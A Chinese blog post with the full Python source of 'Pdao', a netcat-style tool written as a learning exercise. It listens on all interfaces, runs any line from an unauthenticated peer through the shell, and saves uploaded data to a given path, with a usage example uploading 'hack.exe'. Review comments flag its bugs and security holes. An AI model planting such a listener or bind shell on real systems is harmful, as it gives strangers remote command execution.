
自己动手写工具(1)--Netcat


一直以来都是在用别人写好的工具,为了锻炼自己的编程能力以及更加深刻的理解网络,所以我准备做一个长期的写工具计划。
第一个工具就是仿照netcat写的一个网络连接工具Pdao。netcat被称为网络界的“瑞士军刀”,功能十分丰富;我的工具参考了NC的功能,主要有如下几种:
1.服务端的监听
2.上传文件
3.反弹shell
4.下载文件

import sys
import socket
import getopt
import threading
import subprocess

# global variable
# Run-time configuration shared between Main() and the socket helpers.
# Every value is a placeholder that Main() overwrites from the command line;
# ``upload`` is declared ``global`` in client_handler() but never read there.
listen = command = upload = False   # -l / -c switches
execute = target = upload_des = ""  # -e file to run, -t host, -u destination path
port = 0                            # -p port; 0 means "not given"

# Instructions for use
def usage():
    """Print the help banner to stdout and exit with status 0.

    Main() calls this when no arguments are given, when option parsing
    fails, and for -h/--help.  It never returns: ``sys.exit(0)`` raises
    SystemExit.
    """
    banner = '\t\t\033[0;32m Pdao net Tool \033[0m'
    help_lines = (
        "Usage:python3 pdao.py -t target_host -p port",
        "-l --listen - listen on [host]:[port]",
        "-e --execute=file_to_run -execute the given file upon receiving a connection",
        "-c --command -init a command shell",
        "-u --upload=destination -upload a file and write to [desination]\n",
        "Examples:",
        r"python3 pdao.py -t 100.0.0.1 -p 1234 -l -c -u=c:\\hack.exe",
    )
    print(banner)
    # One print per line in the original; joining with "\n" yields the same bytes.
    print("\n".join(help_lines))
    sys.exit(0)



def clinet_send(buffer):
    """Connect to (target, port), send *buffer*, then relay an interactive session.

    Uses the module globals ``target`` and ``port`` filled in by Main().
    After the optional initial payload it loops forever: read a reply from
    the socket, print it, read one line from stdin and send it back.  The
    loop has no normal exit; it ends only when something raises (peer closed
    the connection, EOF on stdin -> EOFError from input(), a decode error,
    ...), which the bare ``except`` turns into one generic message before
    the socket is closed.

    Args:
        buffer: data to send right after connecting.  Main() passes the
            result of ``sys.stdin.read()`` here, i.e. a ``str``.
    """
    client = socket.socket()
    try:
        client.connect((target,port))

        # NOTE(review): socket.send() requires a bytes-like object.  With the
        # str that Main() passes this raises TypeError, which the bare except
        # below reports only as "[*] Exception Exiting." -- compare the
        # ``.encode()`` applied to the later sends.
        if len(buffer):
            client.send(buffer)

        while True:
            recv_len = 1
            response = ""
            # A short recv (< 1024) is treated as "end of this reply".
            # NOTE(review): a reply that is an exact multiple of 1024 bytes
            # makes the next recv() block until the peer sends more, and
            # decoding each chunk separately fails if a multi-byte character
            # is split across two chunks.
            while recv_len:
                data = client.recv(1024).decode()
                recv_len = len(data)
                response += data
                if recv_len < 1024:
                    break
            print(response)
            # Interactive turn: one operator line, newline-terminated.
            buffer = input("")
            buffer += '\n'
            client.send(buffer.encode())
    except :
        # NOTE(review): the bare except also hides KeyboardInterrupt /
        # SystemExit and the real error text; narrowing it to
        # (OSError, EOFError, UnicodeError) would keep this exit path while
        # letting unexpected failures surface.
        print("[*] Exception Exiting.\n")
        client.close()

def client_handler(clinet_socket):
    """Serve one accepted connection according to the global mode flags.

    Runs in its own thread (started by server_loop()).  Up to three stages
    run in order, selected by the globals Main() fills from the command line:

    1. ``upload_des`` non-empty: read from the socket until the peer closes
       its sending side, then write everything to that path on this host.
    2. ``execute`` non-empty: run it with run_command() and send the output.
    3. ``command`` true: loop forever -- send a prompt, collect one
       newline-terminated line, run it with run_command(), send the result.

    The socket is never closed here; the thread ends only when a stage
    raises (the command loop has no other exit).

    Args:
        clinet_socket: the connected socket returned by ``server.accept()``.
    """
    global upload
    global execute
    global command

    if len(upload_des):
        file_buffer = ""
        # Read until recv() returns empty, i.e. the peer shut down the connection.
        while True:
            data = clinet_socket.recv(1024).decode()
            if not data:
                break
            else:
                file_buffer += data

        # NOTE(review): ``bytes % str`` raises TypeError in Python 3, and the
        # failure branch uses ``&`` where ``%`` was intended, so neither status
        # message reaches send() (the second TypeError escapes the handler).
        # The destination path is the -u value used unchanged, and the data is
        # decoded and written in text mode, so binary uploads are not preserved.
        try:
            file_descriptor = open(upload_des,"w")
            file_descriptor.write(file_buffer)
            file_descriptor.close()
            clinet_socket.send(b"success save file to %s\n"%upload_des)
        except:
            clinet_socket.send(b"Failed to save file to %s\n"&upload_des)

    if len(execute):
        # NOTE(review): run_command() returns bytes (check_output output or the
        # bytes literal), so ``.encode()`` raises AttributeError here; the -c
        # branch below sends the same kind of value unchanged.
        output = run_command(execute)
        clinet_socket.send(output.encode())

    if command:
        # Unauthenticated command loop: every line that arrives on the socket is
        # handed to run_command() (shell=True) on this host.  Any peer that can
        # reach the listening port (bound to 0.0.0.0 by default, see
        # server_loop()) gets that access; nothing here checks who connected.
        while True:
            clinet_socket.send(b"<Pdao_Shell:#>")
            cmd_buffer = ""
            # Accumulate until a newline arrives.  One recv() may carry less or
            # more than a line; text after the first newline is executed too.
            while "\n" not in cmd_buffer:
                cmd_buffer += clinet_socket.recv(1024).decode()
            response = run_command(cmd_buffer)
            clinet_socket.send(response)


def server_loop():
    """Bind to (target, port), accept connections forever, one thread each.

    Uses the globals ``target`` and ``port`` set by Main().  An empty target
    is replaced by "0.0.0.0", so the listener is reachable on every interface
    of the host; no peer address check or authentication happens before
    client_handler() starts acting on the connection.  Accepted sockets are
    handed to a new thread and not tracked afterwards; ``server`` itself is
    never closed (the loop has no exit).
    """
    global target
    global port

    if not len(target):
        target = "0.0.0.0"

    server = socket.socket()
    # NOTE(review): SO_REUSEADDR is not set, so restarting right after a client
    # disconnect can fail with "address already in use" on most platforms.
    server.bind((target,port))
    server.listen(10)
    while True:
        clinet_socket, addr = server.accept()
        # ``addr`` is neither logged nor checked; every peer is served alike.
        clinet_thread = threading.Thread(target=client_handler,args=(clinet_socket,))
        clinet_thread.start()

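def run_command(command):
    """Run *command* through the platform shell and return its combined output.

    Args:
        command: the command line as received (a ``str``).  Trailing
            whitespace, including the newline terminator read from the
            socket, is removed first.

    Returns:
        bytes: stdout and stderr of the command, or a red
        "Failed to execute command." message when the command exits
        non-zero or the shell cannot be started.  Callers send this value
        to the socket unchanged.

    Security: ``shell=True`` passes the string to the shell as-is, and the
    callers feed it text read straight from the network (client_handler),
    so every shell feature -- pipes, redirection, command chaining -- is
    available to the connected peer.  A stricter variant would use
    ``shell=False`` with an argument list and an allow-list of commands.
    """
    command = command.rstrip()
    try:
        output = subprocess.check_output(command, stderr=subprocess.STDOUT, shell=True)
    except (subprocess.CalledProcessError, OSError):
        # CalledProcessError: non-zero exit status; OSError: the shell itself
        # could not be started.  Anything else (KeyboardInterrupt, ...) now
        # propagates instead of being hidden behind the generic message,
        # which the original bare ``except`` did.
        output = b"\033[0;31m Failed to execute command.\n\033[0m"

    return output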

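def Main():
    """Parse the command line into the module globals and start the chosen mode.

    Options (short and long forms are equivalent):
      -h/--help            print usage and exit
      -l/--listen          server mode: bind to -t/-p and accept clients
      -e/--execute FILE    (listen mode) run FILE when a client connects
      -c/--command         (listen mode) hand each received line to the shell
      -u/--upload DEST     (listen mode) store what the client sends at DEST
      -t/--target HOST     host to connect to, or address to bind in listen mode
      -p/--port PORT       TCP port (integer)

    Without -l, when both a target and a positive port are given, stdin is
    read to EOF and handed to clinet_send() as the first payload.  With -l,
    server_loop() runs until the process is killed.  No arguments, an
    unknown option and a non-integer port all end in usage(), which exits.
    """
    global listen
    global execute
    global command
    global upload_des
    global target
    global port

    argv = sys.argv[1:]
    if not argv:
        usage()

    try:
        # Long options that take a value need a trailing "=" in the spec;
        # without it getopt rejects "--port 1234" / "--port=1234" as an
        # unexpected argument, so only the short forms ever worked.
        opts, _ = getopt.getopt(
            argv,
            "hle:t:p:cu:",
            ["help", "listen", "execute=", "target=", "port=", "command", "upload="],
        )
    except getopt.GetoptError as err:
        print('\033[0;31m' + str(err) + '\033[0m')
        usage()

    for opt, val in opts:
        if opt in ("-h", "--help"):
            usage()
        elif opt in ("-l", "--listen"):
            listen = True
        elif opt in ("-e", "--execute"):
            execute = val
        elif opt in ("-c", "--command"):
            command = True
        elif opt in ("-u", "--upload"):
            upload_des = val
        elif opt in ("-t", "--target"):
            target = val
        elif opt in ("-p", "--port"):
            try:
                port = int(val)
            except ValueError:
                # Report the bad value the same way getopt errors are shown.
                print('\033[0;31m' + 'port must be an integer: ' + val + '\033[0m')
                usage()
        else:
            # getopt only yields options from the spec above, so this branch is
            # unreachable; raise explicitly rather than rely on ``assert``,
            # which is stripped under ``python -O``.
            raise ValueError("unhandled option " + opt)

    # Client mode: the whole of stdin becomes the first payload after connecting.
    if not listen and len(target) and port > 0:
        buffer = sys.stdin.read()
        clinet_send(buffer)

    if listen:
        server_loop()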


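# Run only when executed as a script, so that importing this module (for
# reuse or testing) does not read stdin or start a listener as a side effect.
if __name__ == "__main__":
    Main()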